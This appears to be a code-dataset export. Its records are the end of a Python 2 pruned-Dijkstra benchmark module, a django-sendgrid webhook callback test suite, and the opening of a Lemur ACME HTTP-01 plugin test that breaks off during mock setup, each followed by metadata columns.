        destNode = couple[1]
        data = _dijkstra_sc_3(graph, rootNode, destNode, maxDistance)
        result.add(data)
    # Flagged couples: unreachable by construction, skip the search.
    for couple in [c for c in couples if c[2] is not None]:
        rootNode = couple[0]
        destNode = couple[1]
        data = ((rootNode._id, destNode._id), None, INFINITE)
        result.add(data)
    return result
def _dijkstra_sc_3(graph, rootNode, destNode, maxDistance):
    """Pruned Dijkstra with constraints 1 and 3.

    In addition to the cost-based pruning of _dijkstra_sc_1, any
    degree-1 node that is not the destination is a dead end and is
    pruned as well. Returns ((root_id, dest_id), path, cost).
    NOTE(review): maxDistance is accepted but never used here.
    """
    # Run-unique sentinels: OUT_OF_RANGE marks pruned nodes,
    # NOT_WALKABLE marks arcs already walked in this run.
    OUT_OF_RANGE = - rootNode._id - clock()
    NOT_WALKABLE = clock()
    pathTree = Tree(rootNode._id)
    pathCost = dict.fromkeys(graph._nodes.iterkeys(), INFINITE)
    pathCost[rootNode._id] = 0.0
    Q = PriorityQueue()
    Q.insert(rootNode._id, 0.0)
    while not Q.is_empty():
        minNodeId = Q.delete_min().element
        for arc in graph.get_incident_arcs(minNodeId):
            if arc.status == NOT_WALKABLE: continue
            headNodeId = arc._head
            headNode = graph.get_node_by_id(headNodeId)
            if headNode.status == OUT_OF_RANGE: continue
            else:
                # Constraint 3: degree-1 non-destination nodes are dead
                # ends. Constraint 1: prune nodes that cannot beat the
                # current best cost to the destination.
                newCost = pathCost[minNodeId] + arc.info
                if (headNodeId != destNode._id and headNode._deg == 1) or newCost >= pathCost[destNode._id]:
                    headNode.status = OUT_OF_RANGE
                    continue
            tailNodeCost = pathCost[minNodeId]
            arcCost = arc.info
            headNodeCost = pathCost[headNodeId]
            if headNodeCost == INFINITE:
                # First visit: record cost/tree edge, block reverse arc.
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.insert(headNodeId, newCost)
                pathTree.insert(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
            elif (tailNodeCost + arcCost) < headNodeCost:
                # Cheaper path found: re-parent, decrease key, swap the
                # blocked reverse arc.
                prevFatherNodeId = pathTree.get_father(headNodeId)
                graph.set_arc_status(headNodeId, prevFatherNodeId, None)
                newCost = tailNodeCost + arcCost
                pathCost[headNodeId] = newCost
                Q.decrease_key(headNodeId, newCost)
                pathTree.make_son(minNodeId, headNodeId)
                graph.set_arc_status(headNodeId, minNodeId, NOT_WALKABLE)
    couple = (rootNode._id, destNode._id)
    try:
        path = pathTree.get_path_to(destNode._id)
    except KeyError:
        # Destination never entered the tree: unreachable.
        path = None
    cost = pathCost[destNode._id]
    return (couple, path, cost)
def __test(func, graph, numNodes, maxDistance):
    """Benchmark one shortest-path implementation and print a report.

    Python 2 module: print statements throughout. Imports the map
    statistics helpers lazily so they are only needed for testing.
    """
    from utils.map_utils import isolation, blocking_nodes, average_node_deg, average_arc_weight
    print "### iPATH TEST ALGORITHM"
    print "### Type: Shortest Path"
    print "### Implementation: {}".format(str(func.__name__))
    print "### Num. Random Nodes: {}".format(str(numNodes))
    print "### Max Distance: {}".format(str(maxDistance))
    print "###"
    print "### Nodes: {}".format(str(graph.get_num_nodes()))
    print "### Arcs: {}".format(str(graph.get_num_arcs()))
    print "### Deg: {} deg/node".format(str(average_node_deg(graph)))
    print "### Weight: {} meters/arc".format(str(average_arc_weight(graph)))
    print "### Blocking: {} %".format(str(blocking_nodes(graph)))
    print "### Isolation: {} %\n".format(str(isolation(graph)))
    print "Computing Result . . ."
    result = func(graph, numNodes, maxDistance)
    print "\n*** RESULT ***\n"
    print result
    print "\n### END OF TEST ###\n"
if __name__ == "__main__":
    # Parse the test map once, then benchmark every Dijkstra variant.
    from test.__init__ import TEST_SOURCE_REAL_ROME as TEST
    from control.parse.c_element_tree import cElementTreeParser
    FUNCS = [dijkstra_sc_0,
             dijkstra_sc_1,
             dijkstra_sc_2,
             dijkstra_sc_3]
    source = TEST
    print "Source: {}".format(source)
    print "Parsing Graph . . .\n"
    graph = cElementTreeParser().parse_file(source)
    num_nodes = 200
    max_distance = 100
    for func in FUNCS:
        __test(func, graph, num_nodes, max_distance)
| 39.343949
| 108
| 0.589526
| 1,279
| 12,354
| 5.486317
| 0.112588
| 0.029927
| 0.030782
| 0.035913
| 0.83369
| 0.820009
| 0.820009
| 0.80818
| 0.798774
| 0.798774
| 0
| 0.007281
| 0.321839
| 12,354
| 314
| 109
| 39.343949
| 0.83027
| 0.012223
| 0
| 0.794574
| 0
| 0
| 0.027131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.031008
| null | null | 0.069767
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fc1069151df3b1b95353bda9d37294b7177e55da
| 13,528
|
py
|
Python
|
sendgrid/tests/test_views.py
|
mattijevi/django-sendgrid
|
f930cb1759ea034a4a54dc1e077e8e8bb8b7206b
|
[
"BSD-2-Clause"
] | 7
|
2015-03-29T05:56:50.000Z
|
2018-09-13T09:48:18.000Z
|
sendgrid/tests/test_views.py
|
mattijevi/django-sendgrid
|
f930cb1759ea034a4a54dc1e077e8e8bb8b7206b
|
[
"BSD-2-Clause"
] | 10
|
2015-02-12T17:06:21.000Z
|
2019-11-28T07:59:22.000Z
|
sendgrid/tests/test_views.py
|
mattijevi/django-sendgrid
|
f930cb1759ea034a4a54dc1e077e8e8bb8b7206b
|
[
"BSD-2-Clause"
] | 9
|
2015-01-02T06:27:13.000Z
|
2019-06-19T02:11:10.000Z
|
from django.test import TestCase, Client
from django.conf import settings
import json
from sendgrid import utils, models
class BaseTest(TestCase):
    """Shared fixtures: a CSRF-enforcing test client and default email
    keyword arguments reused by every test case below."""

    def setUp(self):
        self.client = Client(enforce_csrf_checks=True)
        self.email_data = dict(
            subject='Test Subject',
            body='Hi, I am a test body',
            from_email='email@example.com',
            to=('other_email@example.com',),
        )
        super(BaseTest, self).setUp()
class ViewTestCase(BaseTest):
    """Exercise the /sendgrid_callback/ view: event transitions driven by
    simulated Sendgrid POSTs against a single sent Email model."""

    def test_callback_view(self):
        """ Test email callback.
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': message.uuid,
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # this should have modified the existing email model
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'processed')

    def test_callback_view_error(self):
        """ Test the callback view with erroneous data.
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid with an unknown uuid -> lookup fails
        with self.assertRaises(models.Email.DoesNotExist):
            self.client.post('/sendgrid_callback/',
                             data=json.dumps([{'email': 'other_email@example.com',
                                               'uuid': '333',
                                               'event': 'processed',
                                               'timestamp': '123456789', }, ]),
                             content_type='application/json')
        # nothing should have changed
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')

    def test_callback_with_missing_data(self):
        """ Test the callback view with erroneous data.
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid with no uuid key at all
        with self.assertRaises(KeyError):
            self.client.post('/sendgrid_callback/',
                             data=json.dumps([{'email': 'other_email@example.com',
                                               'event': 'processed',
                                               'timestamp': '123456789', }, ]),
                             content_type='application/json')
        # nothing should have changed
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')

    def test_wrong_transition(self):
        """ Test what happens if we try to do a wrong state transition
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        _mail = models.Email.objects.all()[0]
        self.assertEqual(_mail.event, 'initiated')
        # force a terminal-looking state, then attempt to move backwards
        _mail.event = 'bounce'
        _mail.save()
        # simulate callback by sendgrid
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': message.uuid,
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # nothing should have changed
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'bounce')

    def test_state_transitions(self):
        """ Test normal state transitions.
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid: initiated -> processed
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': message.uuid,
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # this should have modified the existing email model
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'processed')
        # simulate next callback by sendgrid: processed -> delivered
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': message.uuid,
                                        'event': 'delivered',
                                        'timestamp': '123459999',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # this should have modified the existing email model
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'delivered')

    def test_null_reason(self):
        """ Test what happens if we send a null value as a reason, opposed to a missing reason.
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid carrying an explicit null reason
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': message.uuid,
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                        'reason': None,
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # this should have modified the existing email model
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'processed')

    def test_wrong_saved_state(self):
        """ Test what happens if we saved a non-existent state in our email
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        _mail = models.Email.objects.all()[0]
        self.assertEqual(_mail.event, 'initiated')
        # corrupt the stored state with a value outside the state machine
        _mail.event = 'bacon'
        _mail.save()
        # simulate callback by sendgrid: the unknown state raises KeyError
        with self.assertRaises(KeyError):
            self.client.post('/sendgrid_callback/',
                             data=json.dumps([{'email': 'other_email@example.com',
                                               'uuid': message.uuid,
                                               'event': 'processed',
                                               'timestamp': '123456789', }, ]),
                             content_type='application/json')
class ViewTZTestCase(ViewTestCase):
    """Re-run every ViewTestCase test with USE_TZ forced on, restoring
    the original setting afterwards."""

    def setUp(self):
        self._saved_use_tz = settings.USE_TZ
        settings.USE_TZ = True
        super(ViewTZTestCase, self).setUp()

    def tearDown(self):
        settings.USE_TZ = self._saved_use_tz
        super(ViewTZTestCase, self).tearDown()
class ViewNoTZTestCase(ViewTestCase):
    """Re-run every ViewTestCase test with USE_TZ forced off, restoring
    the original setting afterwards."""

    def setUp(self):
        self._saved_use_tz = settings.USE_TZ
        settings.USE_TZ = False
        super(ViewNoTZTestCase, self).setUp()

    def tearDown(self):
        settings.USE_TZ = self._saved_use_tz
        super(ViewNoTZTestCase, self).tearDown()
class IgnoreMissingTestCase(BaseTest):
    """ Test cases for SENDGRID_EVENTS_IGNORE_MISSING enabled.
    """

    def setUp(self):
        super(IgnoreMissingTestCase, self).setUp()
        # Lenient mode: the callback view tolerates unknown/missing emails.
        settings.SENDGRID_EVENTS_IGNORE_MISSING = True

    def tearDown(self):
        # Remove the attribute entirely so other test cases see the default.
        del settings.SENDGRID_EVENTS_IGNORE_MISSING
        super(IgnoreMissingTestCase, self).tearDown()

    def test_callback_view_lenient_errors(self):
        """ Test callback using a non-existent, malformed UUID.
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid: unknown uuid returns 200, no raise
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': '333',
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # nothing should have changed
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')

    def test_callback_with_missing_data(self):
        """ Test callback with missing data (no UUID).
        This is the default case if emails are not sent with our Classes
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')
        # simulate callback by sendgrid without a uuid key: ignored, 200
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # nothing should have changed
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'initiated')

    def test_wrong_saved_state(self):
        """ Test what happens if we saved a non-existent state in our email
        """
        message = utils.SendgridEmailMessage(**self.email_data)
        message.send()
        # test initial email state
        self.assertEqual(models.Email.objects.count(), 1)
        _mail = models.Email.objects.all()[0]
        self.assertEqual(_mail.event, 'initiated')
        # corrupt the stored state with a value outside the state machine
        _mail.event = 'bacon'
        _mail.save()
        # simulate callback by sendgrid: in lenient mode this returns 200
        # instead of raising (contrast ViewTestCase.test_wrong_saved_state)
        response = self.client.post('/sendgrid_callback/',
                                    data=json.dumps([{
                                        'email': 'other_email@example.com',
                                        'uuid': message.uuid,
                                        'event': 'processed',
                                        'timestamp': '123456789',
                                    }, ]),
                                    content_type='application/json')
        self.assertEqual(response.status_code, 200)
        # nothing should have changed
        self.assertEqual(models.Email.objects.count(), 1)
        self.assertEqual(models.Email.objects.all()[0].event, 'bacon')
| 41.624615
| 95
| 0.524468
| 1,233
| 13,528
| 5.652068
| 0.112733
| 0.103315
| 0.103315
| 0.13804
| 0.841728
| 0.828383
| 0.811738
| 0.811738
| 0.811738
| 0.811738
| 0
| 0.019738
| 0.36709
| 13,528
| 324
| 96
| 41.753086
| 0.794207
| 0.129731
| 0
| 0.811594
| 0
| 0
| 0.118228
| 0.023697
| 0
| 0
| 0
| 0
| 0.246377
| 1
| 0.082126
| false
| 0
| 0.019324
| 0
| 0.125604
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc3062bbd4b3ec7dd3af2ea3e1a9dd87497d624e
| 18,056
|
py
|
Python
|
lemur/plugins/lemur_acme/tests/test_acme_http.py
|
dck25/lemur
|
32dda00f9fb4b72091bb3f4e7be1d262ea5fd857
|
[
"Apache-2.0"
] | 1,656
|
2015-09-20T03:12:28.000Z
|
2022-03-29T18:00:54.000Z
|
lemur/plugins/lemur_acme/tests/test_acme_http.py
|
dck25/lemur
|
32dda00f9fb4b72091bb3f4e7be1d262ea5fd857
|
[
"Apache-2.0"
] | 3,017
|
2015-09-18T23:15:24.000Z
|
2022-03-30T22:40:02.000Z
|
lemur/plugins/lemur_acme/tests/test_acme_http.py
|
hosseinsh/lemur
|
fbf50b365cb0f7a0e9cae31dec1b853b958c45bb
|
[
"Apache-2.0"
] | 401
|
2015-09-18T23:02:18.000Z
|
2022-02-20T16:13:14.000Z
|
import unittest
from unittest.mock import patch, Mock
from acme import challenges
from flask import Flask
from lemur.plugins.lemur_acme import plugin
class TestAcmeHttp(unittest.TestCase):
    """Tests for the ACME HTTP-01 issuer plugin (``plugin.ACMEHttpIssuerPlugin``)."""

    def setUp(self):
        self.ACMEHttpIssuerPlugin = plugin.ACMEHttpIssuerPlugin()
        self.acme = plugin.AcmeHandler()
        # Creates a new Flask application for a test duration. In python 3.8, manual push of application context is
        # needed to run tests in dev environment without getting error 'Working outside of application context'.
        _app = Flask('lemur_test_acme')
        self.ctx = _app.app_context()
        assert self.ctx
        self.ctx.push()

    def tearDown(self):
        # Pop the Flask application context pushed in setUp.
        self.ctx.pop()

    def test_create_authority(self):
        """create_authority returns the configured root cert, an empty
        intermediate, and a single placeholder role named after the authority."""
        options = {
            "plugin": {"plugin_options": [{"name": "certificate", "value": "123"}]},
            "name": "mock_authority"
        }
        acme_root, b, role = self.ACMEHttpIssuerPlugin.create_authority(options)
        self.assertEqual(acme_root, "123")
        self.assertEqual(b, "")
        self.assertEqual(role, [{"username": "", "password": "", "name": "acme_mock_authority"}])

    # Note: @patch decorators apply bottom-up, so the bottom-most patch
    # (authorization_service) maps to the first mock argument.
    @patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.setup_acme_client")
    @patch("lemur.plugins.base.manager.PluginManager.get")
    @patch("lemur.plugins.lemur_acme.challenge_types.destination_service")
    @patch("lemur.plugins.lemur_acme.plugin.AcmeHandler.request_certificate")
    @patch("lemur.plugins.lemur_acme.plugin.authorization_service")
    def test_create_certificate(
        self,
        mock_authorization_service,
        mock_request_certificate,
        mock_destination_service,
        mock_plugin_manager_get,
        mock_acme,
    ):
        """Happy path: an HTTP-01 challenge is offered, the token destination
        exists, and create_certificate splits the finalized full chain into
        the leaf certificate and the remaining chain."""
        provider = plugin.ACMEHttpIssuerPlugin()
        mock_authority = Mock()
        # Authority options are stored as a JSON string; tokenDestination must
        # match the destination label mocked below.
        mock_authority.options = '[{"name": "tokenDestination", "value": "mock-sftp-destination"}]'
        # Build an order resource whose single authorization offers an HTTP-01 challenge.
        mock_order_resource = Mock()
        mock_order_resource.authorizations = [Mock()]
        mock_order_resource.authorizations[0].body.challenges = [Mock()]
        mock_order_resource.authorizations[0].body.challenges[0].response_and_validation.return_value = (
            Mock(), "Anything-goes")
        mock_order_resource.authorizations[0].body.challenges[0].chall = challenges.HTTP01(
            token=b'\x0f\x1c\xbe#od\xd1\x9c\xa6j\\\xa4\r\xed\xe5\xbf0pz\xeaxnl)\xea[i\xbc\x95\x08\x96\x1f')
        mock_client = Mock()
        mock_client.new_order.return_value = mock_order_resource
        mock_client.answer_challenge.return_value = True
        # Finalized order carries a full chain of three PEM blocks: the leaf
        # (duplicated intermediate here) followed by the chain certificates.
        mock_finalized_order = Mock()
        mock_finalized_order.fullchain_pem = """
-----BEGIN CERTIFICATE-----
MIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2
MDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0
8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym
oLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0
ZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN
xDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56
dhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9
AgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw
HQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0
BggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu
b3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu
Y3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq
hkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF
UGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9
AFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp
DQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7
IkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf
zWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI
PTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w
SVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em
2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0
WzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt
n5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIEqzCCApOgAwIBAgIRAIvhKg5ZRO08VGQx8JdhT+UwDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDUyMzIyMDc1OVoXDTM2
MDUyMzIyMDc1OVowIjEgMB4GA1UEAwwXRmFrZSBMRSBJbnRlcm1lZGlhdGUgWDEw
ggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtWKySDn7rWZc5ggjz3ZB0
8jO4xti3uzINfD5sQ7Lj7hzetUT+wQob+iXSZkhnvx+IvdbXF5/yt8aWPpUKnPym
oLxsYiI5gQBLxNDzIec0OIaflWqAr29m7J8+NNtApEN8nZFnf3bhehZW7AxmS1m0
ZnSsdHw0Fw+bgixPg2MQ9k9oefFeqa+7Kqdlz5bbrUYV2volxhDFtnI4Mh8BiWCN
xDH1Hizq+GKCcHsinDZWurCqder/afJBnQs+SBSL6MVApHt+d35zjBD92fO2Je56
dhMfzCgOKXeJ340WhW3TjD1zqLZXeaCyUNRnfOmWZV8nEhtHOFbUCU7r/KkjMZO9
AgMBAAGjgeMwgeAwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQAw
HQYDVR0OBBYEFMDMA0a5WCDMXHJw8+EuyyCm9Wg6MHoGCCsGAQUFBwEBBG4wbDA0
BggrBgEFBQcwAYYoaHR0cDovL29jc3Auc3RnLXJvb3QteDEubGV0c2VuY3J5cHQu
b3JnLzA0BggrBgEFBQcwAoYoaHR0cDovL2NlcnQuc3RnLXJvb3QteDEubGV0c2Vu
Y3J5cHQub3JnLzAfBgNVHSMEGDAWgBTBJnSkikSg5vogKNhcI5pFiBh54DANBgkq
hkiG9w0BAQsFAAOCAgEABYSu4Il+fI0MYU42OTmEj+1HqQ5DvyAeyCA6sGuZdwjF
UGeVOv3NnLyfofuUOjEbY5irFCDtnv+0ckukUZN9lz4Q2YjWGUpW4TTu3ieTsaC9
AFvCSgNHJyWSVtWvB5XDxsqawl1KzHzzwr132bF2rtGtazSqVqK9E07sGHMCf+zp
DQVDVVGtqZPHwX3KqUtefE621b8RI6VCl4oD30Olf8pjuzG4JKBFRFclzLRjo/h7
IkkfjZ8wDa7faOjVXx6n+eUQ29cIMCzr8/rNWHS9pYGGQKJiY2xmVC9h12H99Xyf
zWE9vb5zKP3MVG6neX1hSdo7PEAb9fqRhHkqVsqUvJlIRmvXvVKTwNCP3eCjRCCI
PTAvjV+4ni786iXwwFYNz8l3PmPLCyQXWGohnJ8iBm+5nk7O2ynaPVW0U2W+pt2w
SVuvdDM5zGv2f9ltNWUiYZHJ1mmO97jSY/6YfdOUH66iRtQtDkHBRdkNBsMbD+Em
2TgBldtHNSJBfB3pm9FblgOcJ0FSWcUDWJ7vO0+NTXlgrRofRT6pVywzxVo6dND0
WzYlTWeUVsO40xJqhgUQRER9YLOLxJ0O6C8i0xFxAMKOtSdodMB3RIwt7RFQ0uyt
n5Z5MqkYhlMI3J1tPRTp1nEt9fyGspBOO05gi148Qasp+3N+svqKomoQglNoAxU=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIFATCCAumgAwIBAgIRAKc9ZKBASymy5TLOEp57N98wDQYJKoZIhvcNAQELBQAw
GjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMB4XDTE2MDMyMzIyNTM0NloXDTM2
MDMyMzIyNTM0NlowGjEYMBYGA1UEAwwPRmFrZSBMRSBSb290IFgxMIICIjANBgkq
hkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA+pYHvQw5iU3v2b3iNuYNKYgsWD6KU7aJ
diddtZQxSWYzUI3U0I1UsRPTxnhTifs/M9NW4ZlV13ZfB7APwC8oqKOIiwo7IwlP
xg0VKgyz+kT8RJfYr66PPIYP0fpTeu42LpMJ+CKo9sbpgVNDZN2z/qiXrRNX/VtG
TkPV7a44fZ5bHHVruAxvDnylpQxJobtCBWlJSsbIRGFHMc2z88eUz9NmIOWUKGGj
EmP76x8OfRHpIpuxRSCjn0+i9+hR2siIOpcMOGd+40uVJxbRRP5ZXnUFa2fF5FWd
O0u0RPI8HON0ovhrwPJY+4eWKkQzyC611oLPYGQ4EbifRsTsCxUZqyUuStGyp8oa
aoSKfF6X0+KzGgwwnrjRTUpIl19A92KR0Noo6h622OX+4sZiO/JQdkuX5w/HupK0
A0M0WSMCvU6GOhjGotmh2VTEJwHHY4+TUk0iQYRtv1crONklyZoAQPD76hCrC8Cr
IbgsZLfTMC8TWUoMbyUDgvgYkHKMoPm0VGVVuwpRKJxv7+2wXO+pivrrUl2Q9fPe
Kk055nJLMV9yPUdig8othUKrRfSxli946AEV1eEOhxddfEwBE3Lt2xn0hhiIedbb
Ftf/5kEWFZkXyUmMJK8Ra76Kus2ABueUVEcZ48hrRr1Hf1N9n59VbTUaXgeiZA50
qXf2bymE6F8CAwEAAaNCMEAwDgYDVR0PAQH/BAQDAgEGMA8GA1UdEwEB/wQFMAMB
Af8wHQYDVR0OBBYEFMEmdKSKRKDm+iAo2FwjmkWIGHngMA0GCSqGSIb3DQEBCwUA
A4ICAQBCPw74M9X/Xx04K1VAES3ypgQYH5bf9FXVDrwhRFSVckria/7dMzoF5wln
uq9NGsjkkkDg17AohcQdr8alH4LvPdxpKr3BjpvEcmbqF8xH+MbbeUEnmbSfLI8H
sefuhXF9AF/9iYvpVNC8FmJ0OhiVv13VgMQw0CRKkbtjZBf8xaEhq/YqxWVsgOjm
dm5CAQ2X0aX7502x8wYRgMnZhA5goC1zVWBVAi8yhhmlhhoDUfg17cXkmaJC5pDd
oenZ9NVhW8eDb03MFCrWNvIh89DDeCGWuWfDltDq0n3owyL0IeSn7RfpSclpxVmV
/53jkYjwIgxIG7Gsv0LKMbsf6QdBcTjhvfZyMIpBRkTe3zuHd2feKzY9lEkbRvRQ
zbh4Ps5YBnG6CKJPTbe2hfi3nhnw/MyEmF3zb0hzvLWNrR9XW3ibb2oL3424XOwc
VjrTSCLzO9Rv6s5wi03qoWvKAQQAElqTYRHhynJ3w6wuvKYF5zcZF3MDnrVGLbh1
Q9ePRFBCiXOQ6wPLoUhrrbZ8LpFUFYDXHMtYM7P9sc9IAWoONXREJaO08zgFtMp4
8iyIYUyQAbsvx8oD2M8kRvrIRSrRJSl6L957b4AFiLIQ/GgV2curs0jje7Edx34c
idWw1VrejtwclobqNMVtG3EiPUIpJGpbMcJgbiLSmKkrvQtGng==
-----END CERTIFICATE-----
"""
        mock_finalized_order.alternative_fullchains_pem = [mock_finalized_order.fullchain_pem]
        mock_finalized_order.authorizations = [Mock()]
        mock_client.finalize_order.return_value = mock_finalized_order
        # setup_acme_client returns (client, registration); registration unused here.
        mock_acme.return_value = (mock_client, "")
        # Destination lookup + plugin used to upload the HTTP-01 token.
        mock_destination = Mock()
